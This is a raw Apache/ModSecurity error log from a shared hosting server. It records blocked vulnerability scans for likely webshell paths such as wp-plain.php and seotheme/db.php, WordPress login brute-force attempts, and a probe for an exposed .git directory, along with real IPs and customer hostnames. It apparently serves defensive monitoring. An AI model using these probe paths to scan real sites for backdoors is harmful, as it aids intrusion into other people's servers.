[Tue May 26 19:58:45.792280 2026] [security2:error] [pid 93868:tid 94309] [client 45.92.1.17:53590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u8wAAAcI"]
[Tue May 26 19:58:45.792974 2026] [security2:error] [pid 93576:tid 93799] [client 45.92.1.17:53594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHWDRMqfxdEDkosznOQAAAFc"], referer: www.google.com
[Tue May 26 19:58:45.809631 2026] [security2:error] [pid 93868:tid 94352] [client 45.92.1.17:53601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/eegqraby.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u9QAAAe0"], referer: www.google.com
[Tue May 26 19:58:45.830035 2026] [security2:error] [pid 93868:tid 94368] [client 45.92.1.17:53521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u9gAAAf0"], referer: www.google.com
[Tue May 26 19:58:45.831573 2026] [security2:error] [pid 93868:tid 94313] [client 45.92.1.17:53517] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u9wAAAcY"], referer: www.google.com
[Tue May 26 19:58:45.832732 2026] [security2:error] [pid 93868:tid 94273] [client 45.92.1.17:52942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u-AAAAZ4"]
[Tue May 26 19:58:45.854172 2026] [security2:error] [pid 93868:tid 94292] [client 45.92.1.17:53545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u-QAAAbE"], referer: www.google.com
[Tue May 26 19:58:45.865184 2026] [security2:error] [pid 93868:tid 94340] [client 45.92.1.17:52926] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uYAAAAeE"], referer: www.google.com
[Tue May 26 19:58:45.875356 2026] [security2:error] [pid 93868:tid 94263] [client 45.92.1.17:53549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/uzzfxevt.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u-wAAAZQ"], referer: www.google.com
[Tue May 26 19:58:45.900100 2026] [security2:error] [pid 93576:tid 93808] [client 45.92.1.17:52907] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWuHWDRMqfxdEDkosznNwAAAGA"], referer: www.google.com
[Tue May 26 19:58:45.955703 2026] [security2:error] [pid 93868:tid 94360] [client 45.92.1.17:53608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/qwgxiaca.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25vAQAAAfU"], referer: www.google.com
[Tue May 26 19:58:45.955797 2026] [security2:error] [pid 93868:tid 94322] [client 45.92.1.17:53602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25vAAAAAc8"], referer: www.google.com
[Tue May 26 19:58:45.958267 2026] [security2:error] [pid 93576:tid 93742] [client 45.92.1.17:52902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuHWDRMqfxdEDkosznPAAAAB4"]
[Tue May 26 19:58:45.961131 2026] [security2:error] [pid 93868:tid 94345] [client 45.92.1.17:53579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/doiaypvz.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25vAgAAAeY"], referer: www.google.com
[Tue May 26 19:58:45.975366 2026] [security2:error] [pid 93868:tid 94344] [client 45.92.1.17:53620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/glvytxzo.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25vAwAAAeU"], referer: www.google.com
[Tue May 26 19:58:45.978621 2026] [security2:error] [pid 93868:tid 94260] [client 45.92.1.17:53375] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u_gAAAZE"], referer: www.google.com
[Tue May 26 19:58:46.327529 2026] [security2:error] [pid 93576:tid 93804] [client 45.92.1.17:52931] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuHmDRMqfxdEDkosznPwAAAFw"]
[Tue May 26 19:58:46.747782 2026] [security2:error] [pid 93868:tid 94371] [client 45.92.1.17:53595] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u9AAAAgA"], referer: www.google.com
[Tue May 26 19:58:47.000387 2026] [security2:error] [pid 93868:tid 94332] [client 45.92.1.17:53001] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWuHkqK9k_ZUB2Vp25vGwAAAdk"], referer: www.google.com
[Tue May 26 19:58:47.109841 2026] [security2:error] [pid 93868:tid 94315] [client 45.92.1.17:52926] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWuHkqK9k_ZUB2Vp25vCgAAAcg"], referer: www.google.com
[Tue May 26 19:58:47.291659 2026] [security2:error] [pid 93868:tid 94360] [client 45.92.1.17:53595] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php"] [unique_id "ahWuH0qK9k_ZUB2Vp25vLQAAAfU"], referer: www.google.com
[Tue May 26 19:58:47.406587 2026] [security2:error] [pid 93868:tid 94383] [client 45.92.1.17:52494] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uOgAAAgw"], referer: www.google.com
[Tue May 26 19:58:47.623975 2026] [security2:error] [pid 93868:tid 94334] [client 45.92.1.17:52742] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uTQAAAds"], referer: www.google.com
[Tue May 26 19:58:47.843134 2026] [security2:error] [pid 93868:tid 94327] [client 45.92.1.17:52742] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWuH0qK9k_ZUB2Vp25vPQAAAdQ"], referer: www.google.com
[Tue May 26 19:58:47.974635 2026] [security2:error] [pid 93576:tid 93834] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuH2DRMqfxdEDkosznRwAAAHo"]
[Tue May 26 19:58:48.283453 2026] [security2:error] [pid 93576:tid 93812] [client 89.29.233.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuH2DRMqfxdEDkosznRQAAAGQ"]
[Tue May 26 19:58:49.414117 2026] [security2:error] [pid 93576:tid 93832] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuIGDRMqfxdEDkosznZAAAAHg"]
[Tue May 26 19:58:50.290014 2026] [security2:error] [pid 93868:tid 94189] [remote 198.38.81.14:36910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.81.38.198.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuIkqK9k_ZUB2Vp25viwABqlk"]
[Tue May 26 19:58:51.264193 2026] [security2:error] [pid 93576:tid 93676] [remote 24.199.108.111:46388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.108.199.24.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuI2DRMqfxdEDkoszniwAAfF8"]
[Tue May 26 19:58:51.820516 2026] [security2:error] [pid 93868:tid 94263] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuI0qK9k_ZUB2Vp25vrAAAAZQ"]
[Tue May 26 19:58:51.999961 2026] [security2:error] [pid 93868:tid 94219] [remote 44.242.10.134:18065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.10.242.44.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWuI0qK9k_ZUB2Vp25vugABm2k"]
[Tue May 26 19:58:52.972577 2026] [security2:error] [pid 93868:tid 94221] [remote 94.76.235.103:60538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuJEqK9k_ZUB2Vp25v4gABn2o"]
[Tue May 26 19:58:53.704416 2026] [security2:error] [pid 93868:tid 94054] [remote 44.242.10.134:18065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.10.242.44.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWuJUqK9k_ZUB2Vp25wEQACBhA"], referer: https://shahvishaal.moes-art.com/wp-login.php
[Tue May 26 19:58:53.929698 2026] [security2:error] [pid 93868:tid 94272] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuJUqK9k_ZUB2Vp25wCQAAAZ0"]
[Tue May 26 19:58:54.380679 2026] [security2:error] [pid 93868:tid 94013] [remote 213.171.208.62:38486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWuJkqK9k_ZUB2Vp25wHQABqgw"]
[Tue May 26 19:58:54.625379 2026] [security2:error] [pid 93868:tid 94098] [remote 213.171.208.62:38486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWuJkqK9k_ZUB2Vp25wLwAB4Cc"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:58:56.538483 2026] [security2:error] [pid 93868:tid 94356] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuKEqK9k_ZUB2Vp25wZAAAAfE"]
[Tue May 26 19:58:57.204606 2026] [fcgid:warn] [pid 93868:tid 94351] (70014)End of file found: [client 66.132.195.32:30802] mod_fcgid: can't get data from http client
[Tue May 26 19:58:59.355239 2026] [security2:error] [pid 93868:tid 94324] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuKkqK9k_ZUB2Vp25w2AAAAdE"]
[Tue May 26 19:59:00.908066 2026] [security2:error] [pid 93576:tid 93805] [client 109.248.15.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuLGDRMqfxdEDkoszoIwAAAF0"], referer: https://www.anujtradingco.com/
[Tue May 26 19:59:00.948032 2026] [security2:error] [pid 93576:tid 93808] [client 145.239.10.137:58394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.10.239.145.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gldmarsa.com"] [uri "/000.php"] [unique_id "ahWuLGDRMqfxdEDkoszoJAAAAGA"], referer: http://gldmarsa.com/000.php
[Tue May 26 19:59:01.391600 2026] [autoindex:error] [pid 93868:tid 94260] [client 45.148.10.120:0] AH01276: Cannot serve directory /home1/moesartc/public_html/unsobered.com/staging/.git/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:59:01.936691 2026] [security2:error] [pid 93576:tid 93815] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuLWDRMqfxdEDkoszoPwAAAGc"]
[Tue May 26 19:59:02.877305 2026] [security2:error] [pid 93868:tid 94366] [client 109.248.15.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuLkqK9k_ZUB2Vp25xcQAAAfs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1224835&moderation-hash=f5ff9e7c03587304e3990899337cca54
[Tue May 26 19:59:03.167684 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuLkqK9k_ZUB2Vp25xawAAAZU"]
[Tue May 26 19:59:03.169066 2026] [security2:error] [pid 93868:tid 94378] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuLkqK9k_ZUB2Vp25xWAAAAgc"]
[Tue May 26 19:59:03.216852 2026] [security2:error] [pid 93868:tid 94301] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuLkqK9k_ZUB2Vp25xVwAAAbo"]
[Tue May 26 19:59:03.630728 2026] [security2:error] [pid 93868:tid 94219] [remote 92.205.188.156:53990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWuL0qK9k_ZUB2Vp25xhAABkWk"]
[Tue May 26 19:59:03.720259 2026] [security2:error] [pid 93868:tid 94313] [client 66.146.235.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuL0qK9k_ZUB2Vp25xjwAAAcY"], referer: https://www.anujtradingco.com/
[Tue May 26 19:59:03.882928 2026] [security2:error] [pid 93868:tid 94227] [remote 92.205.188.156:53990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWuL0qK9k_ZUB2Vp25xlgAB6G0"], referer: https://jhonparra.com/wp-login.php
[Tue May 26 19:59:04.241952 2026] [security2:error] [pid 93868:tid 94378] [client 45.92.1.17:49531] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-plain.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25xrwAAAgc"], referer: www.google.com
[Tue May 26 19:59:04.242002 2026] [security2:error] [pid 93868:tid 94346] [client 45.92.1.17:49533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25xsAAAAec"], referer: www.google.com
[Tue May 26 19:59:04.242783 2026] [security2:error] [pid 93868:tid 94369] [client 45.92.1.17:49534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25xsQAAAf4"]
[Tue May 26 19:59:04.385940 2026] [security2:error] [pid 93868:tid 94324] [client 45.92.1.17:63666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWuMEqK9k_ZUB2Vp25xwwAAAdE"]
[Tue May 26 19:59:04.427711 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMGDRMqfxdEDkoszodAAAAFU"]
[Tue May 26 19:59:04.469238 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMGDRMqfxdEDkoszoegAAABE"]
[Tue May 26 19:59:04.470008 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMGDRMqfxdEDkoszoewAAAFQ"]
[Tue May 26 19:59:04.514091 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25xywAAAak"]
[Tue May 26 19:59:04.520378 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25x3QAAAbY"]
[Tue May 26 19:59:04.524953 2026] [security2:error] [pid 93868:tid 94331] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25x3AAAAdg"]
[Tue May 26 19:59:04.525976 2026] [security2:error] [pid 93868:tid 94298] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25x2gAAAbc"]
[Tue May 26 19:59:04.532080 2026] [security2:error] [pid 93868:tid 94340] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25xpQAAAeE"]
[Tue May 26 19:59:04.570753 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25x4QAAAfI"]
[Tue May 26 19:59:04.573350 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuMEqK9k_ZUB2Vp25x4AAAAf8"]
